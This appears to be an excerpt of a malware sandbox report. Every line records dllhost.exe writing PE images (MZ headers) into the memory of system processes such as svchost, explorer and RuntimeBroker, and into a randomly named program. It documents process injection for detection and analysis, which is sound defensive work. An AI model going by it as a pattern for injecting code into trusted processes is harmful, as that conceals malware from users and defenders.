Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2108BCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 29166900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2108BCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 29166900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\explorer.exe base: 32F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\explorer.exe base: 32F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DAC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F560310000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 195E2530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 195E2560000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C4C590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C4C5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18DCC7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18DCCA00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 14D83F10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 14D83F40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1B927020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1B927050000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2DE31080000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2DE310B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 14C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 14E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: C00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1270000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 12B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 12D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 6D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 6F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: CF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: D10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1470000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 15B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 15D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1420000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1440000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 13A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 13C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 5B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 720000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1210000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1440000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 10F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1220000 value starts with: 4D5A
